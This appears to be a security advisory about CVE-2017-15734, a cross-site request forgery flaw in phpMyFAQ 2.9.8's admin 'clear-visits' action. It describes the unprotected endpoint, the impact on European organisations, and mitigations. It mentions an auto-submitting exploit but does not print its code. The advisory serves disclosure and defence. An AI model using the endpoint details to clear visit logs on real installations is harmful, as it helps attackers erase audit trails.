The phpMyFAQ 2.9.8 application contains a Cross-Site Request Forgery (CSRF) vulnerability identified as CVE-2017-15734. The vulnerability exists in the 'clear-visits' action within the admin interface, specifically in the stat.main.php file. This action can be triggered via a GET request to 'admin/index.php?action=clear-visits' without any CSRF token validation or origin verification. An attacker can exploit this by tricking an authenticated admin user into visiting a malicious webpage that automatically submits a GET request to this URL, causing the application to clear visit statistics without the user's explicit consent. The vulnerability requires the victim to be logged in with sufficient permissions to access the 'clear-visits' function. The exploit code provided demonstrates a simple HTML form with JavaScript that auto-submits the request, illustrating the ease of exploitation. The lack of CSRF protection means that the application does not verify whether the request originated from a legitimate source, violating best practices for web application security. Although the impact is limited to clearing visit logs, this unauthorized action could be used to cover tracks or disrupt monitoring activities. No patch links are provided in the source, but the vulnerability is known and documented. The exploit has been tested on Ubuntu and Windows environments, confirming cross-platform applicability. The vulnerability highlights the importance of implementing CSRF tokens and validating request origins for all state-changing operations in web applications.

For European organizations, the impact primarily involves unauthorized administrative actions that can disrupt monitoring and auditing by clearing visit statistics in phpMyFAQ installations. This could hinder incident response and forensic investigations by removing valuable access logs. While the vulnerability does not allow full system compromise or data exfiltration, it undermines the integrity and availability of monitoring data. Organizations relying on phpMyFAQ for knowledge base and FAQ management may experience reduced visibility into user activity and potential misuse of the system. Attackers could leverage this to conceal malicious activities or disrupt normal operations. The requirement for an authenticated session limits the attack surface but does not eliminate risk, especially in environments where users may be tricked into visiting malicious sites. European public sector entities, educational institutions, and businesses using phpMyFAQ could face operational disruptions and reduced trust in their internal knowledge management systems. The medium severity reflects the moderate impact and exploitation complexity.

To mitigate this vulnerability, organizations should immediately update phpMyFAQ to a version that includes CSRF protection for all state-changing actions, including 'clear-visits'. If an official patch is unavailable, administrators should implement custom CSRF token validation in the affected code paths, ensuring that all requests modifying state require a valid token tied to the user session. Additionally, restrict administrative access to trusted networks and enforce strong authentication mechanisms such as multi-factor authentication to reduce the risk of session hijacking. Employ Content Security Policy (CSP) headers and SameSite cookies to limit cross-origin requests. Regularly audit and monitor access logs for unusual activity, especially unexpected clearing of visit statistics. User education on phishing and social engineering risks can reduce the likelihood of users visiting malicious sites that trigger CSRF attacks. Finally, consider isolating the phpMyFAQ admin interface behind VPN or IP whitelisting to further reduce exposure.